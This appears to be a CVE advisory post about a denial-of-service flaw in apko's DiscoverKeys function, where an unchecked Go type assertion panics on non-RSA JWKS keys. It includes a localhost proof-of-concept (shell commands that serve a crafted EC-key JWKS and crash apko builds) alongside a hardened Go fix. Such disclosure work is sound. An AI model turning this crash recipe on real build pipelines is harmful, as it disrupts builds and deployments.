The vulnerability resides in the `DiscoverKeys` function in the `pkg/apk/apk/implementation.go` file. The core issue is an unchecked type assertion on a JSON Web Key Set (JWKS) response: the function unconditionally assumes every key fetched from a remote repository endpoint is an RSA public key. In Go, the single-value type assertion form `key.(rsa.PublicKey)` panics at runtime when the dynamic type does not match; only the two-value form `rsaKey, ok := key.(rsa.PublicKey)` reports the failure through a boolean the caller can check. `DiscoverKeys` uses the single-value form, so it crashes as soon as it encounters any non-RSA key type, such as an Elliptic Curve (EC) or HMAC key. The flaw is triggered during initialization of the APK (Alpine Package Keeper) database, when the tool fetches signing keys. An attacker can exploit this by compromising or controlling a package repository's JWKS endpoint and returning a valid but non-RSA key. Consequently, any client build or deployment workflow that uses a synchronized repository list containing the malicious endpoint crashes immediately. This creates a denial-of-service (DoS) condition against CI/CD pipelines, container image builds, or any other automation that relies on the apko tool for secure package management.
dailycve Form
Platform: apko (Go)
Version: <=0.30.34
Vulnerability: Unchecked assertion
Severity: Moderate
Date: May 4, 2026
Prediction: June 15, 2026
What Undercode Says:
1. Simulate a malicious JWKS endpoint returning an EC key
echo '{"keys":[{"kty":"EC","crv":"P-256","kid":"malicious","x":"...","y":"..."}]}' > malicious_jwks.json
python3 -m http.server 8080 --bind 127.0.0.1 --directory . &
2. Configure apko to use the malicious endpoint (the Python server above speaks plain HTTP, so the URL must use http://, not https://)
cat <<EOF > apko_repo_malicious.yaml
repositories:
- http://localhost:8080/malicious_jwks.json
EOF
3. Trigger the crash
apko build apko_repo_malicious.yaml /tmp/output
Output: panic: interface conversion: fmt.Stringer is ecdsa.PublicKey, not rsa.PublicKey
Exploit:
The exploit is trivial: an attacker with control over a repository’s JWKS endpoint simply returns a valid non-RSA key. Since no type check occurs, the application panics.
Protection:
Use the checked (two-value) form of the type assertion instead of the bare one. For example:
if rsaKey, ok := key.(rsa.PublicKey); ok {
    // handle rsaKey as an RSA public key
} else {
    // return an error for the unsupported key type instead of panicking
}
This replaces the current unchecked form `rsaKey := key.(rsa.PublicKey)`, whose single-value assertion panics on any non-RSA key.
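The following is an added example of the hardened pattern, written for this post; it is not apko's own code. It assumes a hypothetical minimal `jwk` struct and a hypothetical `discoverRSAKeys` function that parses a JWKS document, checks `kty` before building any key, and returns an error for EC or other non-RSA entries instead of panicking. The two JWKS documents are constructed samples with toy parameters, not real keys.

```go
package main

import (
	"crypto/rsa"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"math/big"
)

// jwk holds only the JWKS fields this example needs (hypothetical minimal struct, not apko's own type).
type jwk struct {
	Kty string `json:"kty"`
	Kid string `json:"kid"`
	N   string `json:"n"`
	E   string `json:"e"`
}

// discoverRSAKeys parses a JWKS document and returns its RSA public keys keyed by kid. It checks
// kty before converting anything, so an unexpected key type becomes an error instead of a panic.
func discoverRSAKeys(jwks []byte) (map[string]*rsa.PublicKey, error) {
	var doc struct {
		Keys []jwk `json:"keys"`
	}
	if err := json.Unmarshal(jwks, &doc); err != nil {
		return nil, fmt.Errorf("jwks: invalid JSON: %w", err)
	}
	out := make(map[string]*rsa.PublicKey, len(doc.Keys))
	for _, k := range doc.Keys {
		if k.Kty != "RSA" { // the branch the vulnerable code lacked: reject, don't panic
			return nil, fmt.Errorf("jwks: key %q: unsupported kty %q, expected RSA", k.Kid, k.Kty)
		}
		n, errN := base64.RawURLEncoding.DecodeString(k.N) // JWK parameters are base64url without padding
		e, errE := base64.RawURLEncoding.DecodeString(k.E)
		if errN != nil || errE != nil || len(n) == 0 || len(e) == 0 {
			return nil, fmt.Errorf("jwks: key %q: malformed RSA parameters", k.Kid)
		}
		out[k.Kid] = &rsa.PublicKey{N: new(big.Int).SetBytes(n), E: int(new(big.Int).SetBytes(e).Int64())}
	}
	return out, nil
}

// Constructed sample documents with toy parameters (not real keys); "AQAB" decodes to 65537.
var (
	rsaOnlyJWKS = []byte(`{"keys":[{"kty":"RSA","kid":"good","n":"AQAB","e":"AQAB"}]}`)
	hostileJWKS = []byte(`{"keys":[{"kty":"EC","kid":"malicious","crv":"P-256","x":"AA","y":"AA"}]}`)
)
func main() {
	_, err := discoverRSAKeys(hostileJWKS)
	fmt.Println("hostile JWKS rejected:", err) // an error is returned; the process keeps running
}
```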
Impact:
Denial of service (DoS) in any pipeline or system that uses apko to fetch repository keys, crashing the process and halting all dependent build or deployment operations.
Sources:
Reported By: github.com